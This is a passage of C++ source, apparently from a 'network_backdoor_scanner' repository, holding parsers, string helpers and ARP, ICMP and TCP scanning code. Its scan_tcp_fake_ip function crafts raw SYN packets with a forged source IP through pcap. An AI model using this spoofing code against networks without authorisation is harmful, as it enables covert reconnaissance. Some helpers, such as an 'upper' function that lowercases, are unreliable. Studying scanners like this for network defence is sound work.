                        space_offset=find_string(resolve_string," ");
                    }
                    string element(resolve_string);
                    split=split_string(element,find_string(element,"="));
                    string element_name(split.first),element_value(split.second);
                    right_remove_space(element_name);
                    left_move_string(element_value,1);
                    left_remove_space(element_value);
                    left_remove(element_value,"\"");
                    right_remove(element_value,"\"");
                    resolve_html_set_tag_element(result,element_name,element_value);
                }

                resolve_string=separate_string(in_string,right_flag_front+1,left_flag_back-right_flag_front-2);
                if (!resolve_string.find("\r\n"))
                    left_move_string(resolve_string,2);
                if (-1!=resolve_string.find_last_of("\r\n"))
                    split=split_string(resolve_string,resolve_string.find_last_of("\r\n"));
140 | 141 | resolve_html_set_tag_subtag(result,resolve_string); 142 | } 143 | } 144 | } 145 | return result; 146 | } 147 | 148 | tag resolve_html_to_tag(const tag in_tag) { 149 | string subtag(resolve_html_get_tag_subtag(in_tag)); 150 | return resolve_html_to_tag(subtag); 151 | } 152 | 153 | string resolve_html_to_string(const tag& in_tag) { 154 | string result; 155 | 156 | result="<"; 157 | result+=resolve_html_get_tag_name(in_tag); 158 | result+=" "; 159 | 160 | tag_element_list list(resolve_html_get_tag_element_list(in_tag)); 161 | for (unsigned int index=0,last_index=resolve_html_get_tag_element_count(in_tag);index 9 | 10 | using std::string; 11 | 12 | #endif 13 | 14 | #ifndef _PAIR_ 15 | #define _PAIR_ 16 | 17 | using std::pair; 18 | 19 | #endif 20 | 21 | #ifndef _MAP_ 22 | 23 | #include 24 | 25 | using std::map; 26 | 27 | #endif 28 | 29 | #ifndef _VECTOR_ 30 | 31 | #include 32 | 33 | using std::vector; 34 | 35 | #endif 36 | 37 | 38 | #define HTML_TAG_NAME "HTML_TAG_NAME" 39 | #define HTML_TAG_SUBTAG "HTML_TAG_SUBTAG" 40 | 41 | typedef map tag_data; // tag_name,tag_subtag 42 | typedef map tag_element; // all tag element 43 | typedef vector tag_element_list; 44 | typedef pair tag; 45 | 46 | 47 | tag resolve_html_to_tag(const string in_string); 48 | tag resolve_html_to_tag(const tag in_tag); 49 | string resolve_html_to_string(const tag& in_tag); 50 | 51 | bool resolve_html_is_empty(const tag& in_tag); 52 | string resolve_html_get_tag_name(const tag& in_tag); 53 | void resolve_html_set_tag_name(tag& in_tag,const string tag_name); 54 | string resolve_html_get_tag_subtag(const tag& in_tag); 55 | void resolve_html_set_tag_subtag(tag& in_tag,const string tag_subtag); 56 | unsigned int resolve_html_get_tag_element_count(const tag& in_tag); 57 | tag_element_list resolve_html_get_tag_element_list(const tag& in_tag); 58 | string resolve_html_get_tag_element(const tag& in_tag,const string element_name); 59 | void resolve_html_set_tag_element(tag& in_tag,const string 
element_name,const string element_value); 60 | void resolve_html_delete_tag_element(tag& in_tag,const string element_name); 61 | 62 | #endif 63 | -------------------------------------------------------------------------------- /scanner_framework/resolver_http.cpp: -------------------------------------------------------------------------------- 1 | 2 | #pragma warning (disable:4786) 3 | 4 | #include "resolver_http.h" 5 | #include "resolver_string.h" 6 | 7 | #define HTTP_HEADER_LINE "\r\n" 8 | #define HTTP_HEADER_END "\r\n\r\n" 9 | 10 | unsigned int resolve_http_get_element_count(const http_packet& output_packet) { 11 | return output_packet.size(); 12 | } 13 | 14 | http_packet_element_list resolve_http_get_element_list(const http_packet& output_packet) { 15 | http_packet_element_list list; 16 | for (http_packet::const_iterator iterator=output_packet.begin(); 17 | iterator!=output_packet.end(); 18 | ++iterator) 19 | list.push_back(iterator->first); 20 | return list; 21 | } 22 | 23 | string resolve_http_get_element(const http_packet& output_packet, string element_name) { 24 | http_packet::const_iterator find_iterator=output_packet.find(element_name); 25 | if (find_iterator!=output_packet.end()) 26 | return find_iterator->second; 27 | return ""; 28 | } 29 | 30 | void resolve_http_set_element(http_packet& output_packet,const string element_name,const string element_value) { 31 | output_packet[element_name]=element_value; 32 | } 33 | 34 | void resolve_http_delete_element(http_packet& output_packet,const string element_name) { 35 | http_packet::const_iterator find_iterator=output_packet.find(element_name); 36 | if (find_iterator!=output_packet.end()) 37 | output_packet.erase(element_name); 38 | } 39 | 40 | http_packet resolve_http_to_packet(const string http_header_string) { 41 | http_packet result; 42 | 43 | split_result split(split_string(http_header_string,find_string(http_header_string,HTTP_HEADER_END))); 44 | string resolve_string(split.first); 45 | 46 | while (true) 
{ 47 | split_result line(split_string(resolve_string,find_string(resolve_string,HTTP_HEADER_LINE))); 48 | 49 | if (-1!=find_string(line.first,"HTTP/")) { 50 | split_result http_information(split_string(line.first,find_string(line.first," "))); 51 | string http_mode(http_information.first); 52 | left_remove_space(http_information.second); 53 | http_information=split_string(http_information.second,find_string(http_information.second," ")); 54 | string http_path(http_information.first); 55 | left_remove_space(http_information.second); 56 | left_move_string(http_information.second,5); 57 | right_remove_space(http_information.second); 58 | string http_version(http_information.second); 59 | resolve_http_set_element(result,HTTP_HEADER_MODE,http_mode); 60 | resolve_http_set_element(result,HTTP_HEADER_PATH,http_path); 61 | resolve_http_set_element(result,HTTP_HEADER_VERSION,http_version); 62 | left_move_string(line.second,2); 63 | resolve_string=line.second; 64 | continue; 65 | } 66 | 67 | split_result element(split_string(line.first,find_string(line.first,":"))); 68 | left_move_string(element.second,1); 69 | left_remove_space(element.second); 70 | right_remove_space(element.second); 71 | left_remove_space(element.first); 72 | right_remove_space(element.first); 73 | resolve_http_set_element(result,element.first,element.second); 74 | left_move_string(line.second,2); 75 | resolve_string=line.second; 76 | if (-1==find_string(resolve_string,HTTP_HEADER_LINE)) { 77 | element=split_string(resolve_string,find_string(line.first,":")); 78 | left_remove_space(element.second); 79 | right_remove_space(element.second); 80 | resolve_http_set_element(result,element.first,element.second); 81 | break; 82 | } 83 | } 84 | return result; 85 | } 86 | 87 | string resolve_http_to_string(const http_packet& input_packet) { 88 | if (input_packet.empty()) return ""; 89 | string 
null_string,string_mode(HTTP_HEADER_MODE),string_path(HTTP_HEADER_PATH),string_version(HTTP_HEADER_VERSION),string_context(HTTP_CONTEXT); 90 | 91 | if (null_string==resolve_http_get_element(input_packet,HTTP_HEADER_MODE) || 92 | null_string==resolve_http_get_element(input_packet,HTTP_HEADER_PATH) || 93 | null_string==resolve_http_get_element(input_packet,HTTP_HEADER_VERSION)) return ""; 94 | 95 | string result,context; 96 | unsigned int element_count=resolve_http_get_element_count(input_packet); 97 | http_packet_element_list element(resolve_http_get_element_list(input_packet)); 98 | 99 | result=resolve_http_get_element(input_packet,HTTP_HEADER_MODE); 100 | result+=" "; 101 | result+=resolve_http_get_element(input_packet,HTTP_HEADER_PATH); 102 | result+=" HTTP/"; 103 | result+=resolve_http_get_element(input_packet,HTTP_HEADER_VERSION); 104 | result+=HTTP_HEADER_LINE; 105 | 106 | for (unsigned int index=0;index 8 | 9 | using std::string; 10 | 11 | #endif 12 | 13 | #ifndef _PAIR_ 14 | #define _PAIR_ 15 | 16 | using std::pair; 17 | 18 | #endif 19 | 20 | #ifndef _MAP_ 21 | 22 | #include 23 | 24 | using std::map; 25 | 26 | #endif 27 | 28 | #ifndef _VECTOR_ 29 | 30 | #include 31 | 32 | using std::vector; 33 | 34 | #endif 35 | 36 | 37 | #define HTTP_HEADER_MODE "HTTP_MODE" 38 | #define HTTP_HEADER_PATH "HTTP_PATH" 39 | #define HTTP_HEADER_VERSION "HTTP_VERSION" 40 | #define HTTP_CONTEXT "HTTP_CONTEXT" 41 | 42 | typedef map http_packet; 43 | typedef vector http_packet_element_list; 44 | 45 | http_packet resolve_http_to_packet(const string http_header_string); 46 | string resolve_http_to_string(const http_packet& output_packet); 47 | http_packet resolve_http_combind(const http_packet& http_packet_1,const http_packet& http_packet_2); 48 | 49 | unsigned int resolve_http_get_element_count(const http_packet& output_packet); 50 | http_packet_element_list resolve_http_get_element_list(const http_packet& output_packet); 51 | string resolve_http_get_element(const http_packet& 
output_packet,const string element_name); 52 | void resolve_http_set_element(http_packet& output_packet,const string element_name,const string element_value); 53 | void resolve_http_delete_element(http_packet& output_packet,const string element_name); 54 | 55 | #endif 56 | -------------------------------------------------------------------------------- /scanner_framework/resolver_string.cpp: -------------------------------------------------------------------------------- 1 | 2 | #pragma warning (disable:4786) 3 | 4 | #include 5 | 6 | #include "resolver_string.h" 7 | 8 | 9 | unsigned int find_string(const string in_string,const string find_string) { 10 | return (unsigned int)in_string.find(find_string); 11 | } 12 | 13 | unsigned int find_last_string(const string in_string,const string find_string) { 14 | return (unsigned int)in_string.find_last_of(find_string); 15 | } 16 | 17 | split_result split_string(const string in_string,unsigned int split_point) { 18 | split_result result; 19 | 20 | if (split_point<=in_string.length()) { 21 | result.first=in_string.substr(0,split_point); 22 | result.second=in_string.substr(split_point,in_string.length()); 23 | } else 24 | result.first=in_string; 25 | return result; 26 | } 27 | 28 | split_result split_string(const string in_string,const string split_string_) { 29 | return split_string(in_string,find_string(in_string,split_string_)); 30 | } 31 | 32 | split_block_result split_block(const string in_string,const string split_string_) { 33 | split_block_result result; 34 | 35 | if (!in_string.empty()) { 36 | split_result block; 37 | block.second=in_string; 38 | 39 | while (-1!=find_string(block.second,split_string_)) { 40 | block=split_string(block.second,split_string_); 41 | left_move_string(block.second,1); 42 | 43 | if (!block.first.empty()) 44 | result.push_back(block.first); 45 | } 46 | result.push_back(block.second); 47 | } 48 | 49 | return result; 50 | } 51 | 52 | void erase_string(string& in_string,unsigned int 
erase_point,unsigned int erase_length) { 53 | if (in_string.empty()) return; 54 | if (!(in_string.length()>=erase_point+erase_length)) return; 55 | 56 | string output_string(in_string.substr(0,erase_point)); 57 | output_string+=in_string.substr(erase_point+erase_length,in_string.length()); 58 | in_string=output_string; 59 | } 60 | 61 | unsigned int count_string(string in_string,const string find_string_) { 62 | unsigned int next_point=find_string(in_string,find_string_),count=0; 63 | while (-1!=next_point) { 64 | in_string=in_string.substr(next_point+1,in_string.length()); 65 | ++count;next_point=find_string(in_string,find_string_); 66 | } 67 | return count; 68 | } 69 | 70 | void left_move_string(string& in_string,unsigned int move_offset) { 71 | if (in_string.empty()) return; 72 | in_string=in_string.substr(move_offset,in_string.length()); 73 | } 74 | 75 | void right_move_string(string& in_string,unsigned int move_offset) { 76 | if (in_string.empty()) return; 77 | in_string=in_string.substr(move_offset,in_string.length()-move_offset); 78 | } 79 | 80 | void left_remove(string& in_string,const string remove_string) { 81 | if (in_string.empty()) return; 82 | unsigned int find_index=0; 83 | 84 | while (!(find_index=in_string.find(remove_string))) 85 | in_string=in_string.substr(1,in_string.length()); 86 | } 87 | void right_remove(string& in_string,const string remove_string) { 88 | if (in_string.empty()) return; 89 | unsigned int find_index=0; 90 | 91 | while (in_string.length()==(find_index=in_string.find_last_of(remove_string)+1)) 92 | in_string=in_string.substr(0,in_string.length()-1); 93 | } 94 | 95 | void left_remove_space(string& in_string) { 96 | left_remove(in_string," "); 97 | } 98 | 99 | void right_remove_space(string& in_string) { 100 | right_remove(in_string," "); 101 | } 102 | 103 | string separate_string(const string in_string,const string left_string,const string right_string) { 104 | if (-1==find_string(in_string,left_string) || 
-1==find_string(in_string,right_string)) 105 | return ""; 106 | 107 | split_result split(split_string(in_string,find_string(in_string,left_string)+1)); 108 | return split_string(split.second,find_last_string(split.second,right_string)).first; 109 | } 110 | 111 | string separate_string(const string in_string,const unsigned int split_offset,const unsigned int separete_length) { 112 | split_result split(split_string(in_string,split_offset)); 113 | 114 | return split_string(split.second,separete_length).first; 115 | } 116 | 117 | void replace_string(string& in_string,const string source_string,const string dest_string) { 118 | unsigned int offset=find_string(in_string,source_string); 119 | unsigned int length=source_string.length(); 120 | if (-1!=offset && length) { 121 | split_result split(split_string(in_string,source_string)); 122 | in_string=split.first; 123 | in_string+=dest_string; 124 | left_move_string(split.second,length); 125 | in_string+=split.second; 126 | } 127 | } 128 | 129 | string upper_string(const string in_string) { 130 | string result; 131 | 132 | for (string::const_iterator iterator=in_string.begin(); 133 | iterator!=in_string.end(); 134 | ++iterator) { 135 | char char_=*iterator; 136 | if ('A'<=char_ && char_<='Z') 137 | char_+=32; 138 | result+=char_; 139 | } 140 | return result; 141 | } 142 | 143 | string number_to_string(long in_number) { 144 | string result; 145 | char link_string[16]={0}; 146 | sprintf(link_string,"%ld",in_number); 147 | result=link_string; 148 | return result; 149 | } 150 | 151 | long string_to_number(const char* input_string) { 152 | long return_number=0; 153 | try { 154 | for (int number_index=strlen(input_string)-1;number_index>=0;--number_index,++input_string) { 155 | if (48<=*input_string && *input_string<=57) 156 | return_number+=(*input_string-48)*pow(10,number_index); 157 | else 158 | return -1; 159 | } 160 | } catch (...) 
{ 161 | return -1; 162 | } 163 | return return_number; 164 | } 165 | 166 | long string_to_number(const string& input_string) { 167 | return string_to_number(input_string.c_str()); 168 | } 169 | -------------------------------------------------------------------------------- /scanner_framework/resolver_string.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _RESOLVER_STRING_H__ 3 | #define _RESOLVER_STRING_H__ 4 | 5 | #ifndef _STRING_ 6 | 7 | #include 8 | 9 | using std::string; 10 | 11 | #endif 12 | 13 | #ifndef _PAIR_ 14 | #define _PAIR_ 15 | 16 | using std::pair; 17 | 18 | #endif 19 | 20 | #ifndef _VECTOR_ 21 | 22 | #include 23 | 24 | using std::vector; 25 | 26 | #endif 27 | 28 | typedef vector split_block_result; 29 | typedef pair split_result; 30 | 31 | 32 | unsigned int find_string (const string in_string,const string find_string); 33 | unsigned int find_last_string (const string in_string,const string find_string); 34 | split_result split_string (const string in_string,unsigned int split_point); 35 | split_result split_string (const string in_string,const string split_string); 36 | split_block_result split_block (const string in_string,const string split_string); 37 | void erase_string (string& in_string,unsigned int erase_point,unsigned int erase_length); 38 | unsigned int count_string (string in_string,const string find_string); 39 | void left_move_string (string& in_string,unsigned int move_offset); 40 | void right_move_string (string& in_string,unsigned int move_offset); 41 | void left_remove_space (string& in_string); 42 | void right_remove_space(string& in_string); 43 | void left_remove (string& in_string,const string remove_string); 44 | void right_remove (string& in_string,const string remove_string); 45 | string separate_string (const string in_string,const string left_string,const string right_string); 46 | string separate_string (const string in_string,const unsigned int split_offset,const unsigned 
int separete_length); 47 | void replace_string (string& in_string,const string source_string,const string dest_string); 48 | 49 | string upper_string(const string in_string); 50 | 51 | string number_to_string(long in_number); 52 | long string_to_number(const char* input_string); 53 | long string_to_number(const string& input_string); 54 | 55 | #endif 56 | -------------------------------------------------------------------------------- /scanner_framework/route_design.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/route_design.png -------------------------------------------------------------------------------- /scanner_framework/scan_arp.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | #include 5 | 6 | #include "local_network.h" 7 | #include "scan_arp.h" 8 | 9 | #pragma comment (lib,"wpcap") 10 | 11 | #define ETH_ADDRESS_LENGTH 6 12 | #define ETH_PROTO_ARP 0x806 13 | #define ETH_TRAILER_LENGTH 0x12 14 | 15 | #pragma pack(1) 16 | 17 | typedef struct { 18 | unsigned char dest[ETH_ADDRESS_LENGTH]; 19 | unsigned char source[ETH_ADDRESS_LENGTH]; 20 | unsigned short proto; 21 | } eth,*point_eth; 22 | 23 | typedef struct { 24 | USHORT arp_hrd; 25 | USHORT arp_pro; 26 | UCHAR arp_hln; 27 | UCHAR arp_pln; 28 | USHORT arp_op; 29 | UCHAR arp_sha[6]; 30 | ULONG arp_spa; 31 | UCHAR arp_tha[6]; 32 | ULONG arp_tpa; 33 | } arp,*point_arp; 34 | 35 | #pragma pack(4) 36 | 37 | static pcap_t* adapter=NULL; 38 | 39 | bool scan_arp_init(void) { 40 | char buffer[64]={0}; 41 | pcap_if_t *devsin; 42 | pcap_if_t *d; 43 | int i=0; 44 | char errorbuf[PCAP_ERRBUF_SIZE]={0}; 45 | 46 | if (pcap_findalldevs(&devsin, errorbuf) == -1) 47 | return false; 48 | 49 | for(d=devsin, i=0; i< ADAPTER_INDEX-1 ;d=d->next, i++); 50 | 51 | if ((adapter= pcap_open_live(d->name, 65536, 
1,1000, errorbuf )) == NULL) 52 | return false; 53 | 54 | return true; 55 | } 56 | 57 | void scan_arp_clean(void) { 58 | pcap_close(adapter); 59 | } 60 | 61 | bool scan_arp(const char* targe_ip,char* output_mac) { 62 | char send_packet[ARP_PING_SEND_BUFFER_LENGTH]={0}; 63 | 64 | point_eth peth=(point_eth)send_packet; 65 | peth->dest[0]=0xFF; 66 | peth->dest[1]=0xFF; 67 | peth->dest[2]=0xFF; 68 | peth->dest[3]=0xFF; 69 | peth->dest[4]=0xFF; 70 | peth->dest[5]=0xFF; 71 | memcpy(&peth->source,local_mac,ETH_ADDRESS_LENGTH); 72 | peth->proto=htons(ETH_PROTO_ARP); 73 | 74 | point_arp parp=(point_arp)(send_packet+sizeof(eth)); 75 | parp->arp_hrd=htons(0x0001); 76 | parp->arp_pro=htons(0x0800); 77 | parp->arp_hln=0x6; 78 | parp->arp_pln=0x4; 79 | parp->arp_op=htons(0x0001); 80 | memcpy(&parp->arp_sha,local_mac,ETH_ADDRESS_LENGTH); 81 | parp->arp_spa=inet_addr(local_ip); 82 | parp->arp_tha[0]=0x00; 83 | parp->arp_tha[1]=0x00; 84 | parp->arp_tha[2]=0x00; 85 | parp->arp_tha[3]=0x00; 86 | parp->arp_tha[4]=0x00; 87 | parp->arp_tha[5]=0x00; 88 | parp->arp_tpa=inet_addr(targe_ip); 89 | 90 | char* eth_trailer=(char*)(send_packet+sizeof(eth)+sizeof(arp)); 91 | for (int i=0;iarp_spa==inet_addr(targe_ip)) { 107 | memcpy(output_mac,parp->arp_sha,ETH_ADDRESS_LENGTH); 108 | return true; 109 | } 110 | new_tick=GetTickCount(); 111 | } while ((new_tick-old_tick)<=ARP_PING_WAIT_TIME); 112 | 113 | return false; 114 | } 115 | -------------------------------------------------------------------------------- /scanner_framework/scan_arp.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _SCAN_ARP_H__ 3 | #define _SCAN_ARP_H__ 4 | 5 | #define ADAPTER_INDEX 1 6 | 7 | #define ARP_PING_SEND_BUFFER_LENGTH 512 8 | 9 | #define ARP_PING_WAIT_TIME 200 10 | 11 | bool scan_arp_init(void); 12 | bool scan_arp(const char* targe_ip,char* output_mac); 13 | void scan_arp_clean(void); 14 | 15 | #endif 16 | 
-------------------------------------------------------------------------------- /scanner_framework/scan_icmp.cpp: -------------------------------------------------------------------------------- 1 | 2 | #pragma warning (disable:4786) 3 | 4 | #include 5 | 6 | #include 7 | #include 8 | 9 | #include "scan_icmp.h" 10 | 11 | #define ICMP_TTL_TRANSIT 11013 12 | 13 | typedef unsigned long IPAddr; 14 | 15 | typedef struct ip_option_information { 16 | UCHAR Ttl; 17 | UCHAR Tos; 18 | UCHAR Flags; 19 | UCHAR OptionsSize; 20 | PUCHAR OptionsData; 21 | } IP_OPTION_INFORMATION, *PIP_OPTION_INFORMATION; 22 | 23 | typedef struct icmp_echo_reply { 24 | IPAddr Address; 25 | ULONG Status; 26 | ULONG RoundTripTime; 27 | USHORT DataSize; 28 | USHORT Reserved; 29 | PVOID Data; 30 | struct ip_option_information Options; 31 | } ICMP_ECHO_REPLY, *PICMP_ECHO_REPLY; 32 | 33 | typedef DWORD (__stdcall *IcmpSendEcho)(HANDLE,IPAddr,LPVOID,WORD,PIP_OPTION_INFORMATION,LPVOID,DWORD,DWORD); 34 | typedef HANDLE (__stdcall *IcmpCreateFile)(void); 35 | typedef BOOL (__stdcall *IcmpCloseHandle)(HANDLE); 36 | 37 | static HMODULE lModl=NULL; 38 | 39 | static IcmpCreateFile fIcmpCreateFile=NULL; 40 | static IcmpSendEcho fIcmpSendEcho=NULL; 41 | static IcmpCloseHandle fIcmpCloseHandle=NULL; 42 | static HANDLE fHandle=INVALID_HANDLE_VALUE; 43 | 44 | bool scan_icmp_init(void) { 45 | lModl=(HMODULE)LoadLibrary ("iphlpapi.dll"); 46 | if (lModl==NULL) 47 | return false; 48 | else{ 49 | fIcmpCreateFile=(IcmpCreateFile)GetProcAddress (lModl,"IcmpCreateFile"); 50 | fIcmpSendEcho=(IcmpSendEcho)GetProcAddress (lModl,"IcmpSendEcho"); 51 | fIcmpCloseHandle=(IcmpCloseHandle)GetProcAddress (lModl,"IcmpCloseHandle"); 52 | if (fIcmpCreateFile==NULL || fIcmpSendEcho==NULL || fIcmpCloseHandle==NULL) 53 | return false; 54 | 55 | fHandle=fIcmpCreateFile(); 56 | return true; 57 | } 58 | } 59 | 60 | bool scan_icmp(const char* target_ip,reply* output_information) { 61 | IPAddr pAddr; 62 | pAddr=(IPAddr)inet_addr ((char 
*)target_ip); 63 | icmp_echo_reply pData; 64 | memset(&pData,0,sizeof(icmp_echo_reply)); 65 | bool Rtn=false; 66 | int state=0; 67 | reply output={0}; 68 | output.count=ICMP_PING_LOOP_COUNT; 69 | 70 | for (int i=0;i=2) Rtn=true; 87 | 88 | return Rtn; 89 | } 90 | 91 | ping_list scan_icmp_list(const char* target_network,unsigned long target_network_subnet) { 92 | ping_list result; 93 | } 94 | 95 | tracert_list scan_icmp_tracert(const char* target_ip) { 96 | tracert_list result; 97 | IPAddr target_addr=(IPAddr)inet_addr(target_ip); 98 | icmp_echo_reply reply={0}; 99 | ip_option_information icmp_options; 100 | icmp_options.Flags=0; 101 | icmp_options.OptionsData=NULL; 102 | icmp_options.OptionsSize=0; 103 | icmp_options.Tos=0; 104 | unsigned int lost_ping_index=0; 105 | 106 | for (unsigned index=1;index<=255;++index) { 107 | icmp_options.Ttl=index; 108 | fIcmpSendEcho(fHandle,target_addr,NULL,0,&icmp_options,(LPVOID)&reply,sizeof(icmp_echo_reply),ICMP_PING_TIMEOUT); 109 | 110 | in_addr addr; 111 | addr.S_un.S_addr=reply.Address; 112 | if (ICMP_TTL_TRANSIT==reply.Status) { 113 | result.push_back(inet_ntoa(addr)); 114 | lost_ping_index=0; 115 | } else if (!reply.Status) { 116 | result.push_back(inet_ntoa(addr)); 117 | break; 118 | } else { 119 | result.push_back("*"); 120 | ++lost_ping_index; 121 | 122 | if (lost_ping_index>=6) 123 | break; 124 | } 125 | } 126 | return result; 127 | } 128 | 129 | void scan_icmp_clean(void) { 130 | fIcmpCloseHandle(fHandle); 131 | FreeLibrary (lModl); 132 | lModl=NULL; 133 | fIcmpCreateFile =NULL; 134 | fIcmpSendEcho =NULL; 135 | fIcmpCloseHandle =NULL; 136 | } 137 | -------------------------------------------------------------------------------- /scanner_framework/scan_icmp.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _SCAN_ICMP_H__ 3 | #define _SCAN_ICMP_H__ 4 | 5 | #ifndef _STRING_ 6 | 7 | #include 8 | 9 | using std::string; 10 | 11 | #endif 12 | 13 | #ifndef _VECTOR_ 14 | 15 | 
#include 16 | 17 | using std::vector; 18 | 19 | #endif 20 | 21 | #define ICMP_PING_LOOP_COUNT 4 22 | #define ICMP_PING_TIMEOUT 5000 23 | 24 | typedef vector tracert_list; 25 | typedef struct { 26 | unsigned int count; 27 | unsigned int lost; 28 | unsigned int delay; 29 | } reply; 30 | 31 | typedef struct { 32 | string ip; 33 | reply ping_reply; 34 | } reply_ip; 35 | typedef vector ping_list; 36 | 37 | bool scan_icmp_init(void); 38 | bool scan_icmp(const char* target_ip,reply* output_information); 39 | ping_list scan_icmp_list(const char* target_network,unsigned long target_network_subnet); 40 | tracert_list scan_icmp_tracert(const char* target_ip); 41 | void scan_icmp_clean(void); 42 | 43 | #endif 44 | -------------------------------------------------------------------------------- /scanner_framework/scan_tcp.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #include 9 | 10 | #include "local_network.h" 11 | #include "scan_arp.h" 12 | #include "scan_tcp.h" 13 | #include "scan_tcp_header.h" 14 | 15 | using std::string; 16 | 17 | #define ETH_ADDRESS_LENGTH 6 18 | #define ETH_PROTO_IP 0x800 19 | 20 | #pragma pack(1) 21 | 22 | typedef struct { 23 | unsigned char dest[ETH_ADDRESS_LENGTH]; 24 | unsigned char source[ETH_ADDRESS_LENGTH]; 25 | unsigned short proto; 26 | } eth_header,*point_eth_header; 27 | 28 | typedef struct { 29 | unsigned char h_lenver; 30 | unsigned char tos; 31 | unsigned short total_len; 32 | unsigned short ident; 33 | unsigned short frag_and_flags; 34 | unsigned char ttl; 35 | unsigned char proto; 36 | unsigned short checksum; 37 | unsigned int sourceIP; 38 | unsigned int destIP; 39 | } ip_header,*point_ip_header; 40 | 41 | #define TH_FIN 0x01 42 | #define TH_SYN 0x02 43 | #define TH_RST 0x04 44 | #define TH_PUSH 0x08 45 | #define TH_ACK 0x10 46 | #define TH_URG 0x20 47 | 48 | typedef struct { 49 | unsigned short th_sorc_port; 50 | unsigned short 
th_dest_port;
    unsigned int th_seq;
    unsigned int th_ack;
    unsigned char th_length;
    unsigned char th_flags;
    unsigned short th_win;
    unsigned short th_sum;
    unsigned short th_urp;
} tcp_header,*point_tcp_header;

typedef struct {
    unsigned long sorc_addr;
    unsigned long dest_addr;
    unsigned char mbz;
    unsigned char protocal;
    unsigned short length;
} tcp_psdheader,*point_tcp_psdheader;

#pragma pack(4)

static pcap_t* adapter=NULL;

static unsigned short checksum( unsigned short *buf, int size) {
    unsigned long cksum = 0;
    while( size > 1) {
        cksum += *buf++;
        size -= sizeof( unsigned short);
    }

    if(size)
        cksum += *( unsigned char *)buf;

    cksum = ( cksum >> 16) + ( cksum & 0xffff);
    cksum += (cksum >>16);
    return ( unsigned short)(~cksum);
}

static bool check_subnet(const char* targe_ip) {
    string local(local_ip);
    string remote(targe_ip);

    local=local.substr(0,local.find_last_of("."));
    remote=remote.substr(0,remote.find_last_of("."));

    if (local==remote)
        return true;
    return false;
}

unsigned int scan_tcp_connect(const char* target_ip,unsigned short target_port) {
    if (NULL==target_ip || !(0port=target_port;
                output_data->proto[0]='H';
                output_data->data_length=recv_length;
                output_data->data=recv_buffer;
                scan_tcp_disconnect(tcp_handle);
                return true;
            }
            memset(recv_packet_buffer,0,PACKET_RECV_BUFFER);
        }

        free(recv_buffer);
        scan_tcp_disconnect(tcp_handle);
    }
    return false;
}

bool scan_tcp_init(void) {
    pcap_if_t *devsin;
    pcap_if_t *d;
    int i=0;
    char errorbuf[PCAP_ERRBUF_SIZE]={0};

    if (pcap_findalldevs(&devsin, errorbuf) == -1)
        return false;

    for(d=devsin, i=0; i< ADAPTER_INDEX-1 ;d=d->next, i++);

    if ((adapter= pcap_open_live(d->name, 65536, 1,1000, errorbuf )) == NULL)
        return false;
    return true;
}

bool scan_tcp_fake_ip(const char* target_ip,unsigned short target_port,const char* fake_ip,unsigned short fake_port) {

    if (NULL!=adapter) {
        char remote_mac[ETH_ADDRESS_LENGTH]={0};
        if (check_subnet(target_ip)) {
            if (!scan_arp(target_ip,remote_mac))
                return false;
        } else
            memcpy(remote_mac,gateway_mac,ETH_ADDRESS_LENGTH);

        char send_packet_options[]={0x02,0x04,0x05,0xb4,0x01,0x03,0x03,0x02,0x01,0x01,0x04,0x02};
        char send_packet[PACKET_SEND_BUFFER]={0};
        char recv_packet[PACKET_RECV_BUFFER]={0};
        char send_packet_calcu_checksum[PACKET_RECV_BUFFER]={0};

        point_eth_header eth_header_=(point_eth_header)send_packet;
        memcpy(eth_header_->source,local_mac,ETH_ADDRESS_LENGTH);
        memcpy(eth_header_->dest,remote_mac,ETH_ADDRESS_LENGTH);
        eth_header_->proto=htons(ETH_PROTO_IP);

        point_ip_header ip_header_=(point_ip_header)(send_packet+sizeof(eth_header));
        ip_header_->h_lenver=(4<<4 | sizeof(ip_header)/sizeof(unsigned long));
        ip_header_->total_len=htons(sizeof(ip_header)+sizeof(tcp_header)+sizeof(send_packet_options));
        ip_header_->ident=10;
        ip_header_->frag_and_flags=1<<6;
        ip_header_->ttl=128;
        ip_header_->proto=IPPROTO_TCP;
        ip_header_->sourceIP=inet_addr(fake_ip);
        ip_header_->destIP=inet_addr(target_ip);

        point_tcp_header tcp_header_=(point_tcp_header)(send_packet+sizeof(eth_header)+sizeof(ip_header));
        tcp_header_->th_dest_port=htons(target_port);
        tcp_header_->th_sorc_port=htons(fake_port);
        tcp_header_->th_seq=0x1234432;
        tcp_header_->th_ack=0;
        tcp_header_->th_length=0x80;
        tcp_header_->th_flags=TH_SYN;
        tcp_header_->th_win=htons(4096);
        tcp_header_->th_urp=0;
        memcpy((void*)(send_packet+sizeof(eth_header)+sizeof(ip_header)+sizeof(tcp_header)),send_packet_options,sizeof(send_packet_options));

        point_tcp_psdheader tcp_psdheader_=(point_tcp_psdheader)send_packet_calcu_checksum;
        tcp_psdheader_->dest_addr=inet_addr(target_ip);
        tcp_psdheader_->sorc_addr=inet_addr(fake_ip);
        tcp_psdheader_->mbz=0;
        tcp_psdheader_->protocal=IPPROTO_TCP;
        tcp_psdheader_->length=htons(sizeof(tcp_header)+sizeof(send_packet_options));
        memcpy(&send_packet_calcu_checksum[sizeof(tcp_psdheader)],tcp_header_,sizeof(tcp_header));
        memcpy(&send_packet_calcu_checksum[sizeof(tcp_psdheader)+sizeof(tcp_header)],send_packet_options,sizeof(send_packet_options));
        tcp_header_->th_sum=checksum((unsigned short*)send_packet_calcu_checksum,sizeof(tcp_psdheader)+sizeof(tcp_header)+sizeof(send_packet_options));
        ip_header_->checksum=checksum((unsigned short*)ip_header_,sizeof(ip_header));

        pcap_sendpacket(adapter,(const unsigned char *)send_packet,sizeof(eth_header)+sizeof(ip_header)+sizeof(tcp_header)+sizeof(send_packet_options));

        unsigned long old_tick=GetTickCount();
        unsigned long new_tick=old_tick;
        do {
            pcap_pkthdr* header=NULL;
            unsigned char* data=NULL;
            int return_code=pcap_next_ex(adapter,&header,(const unsigned char**)&data);

            if (-1==return_code || 0==return_code) continue;
            eth_header_=(point_eth_header)data;
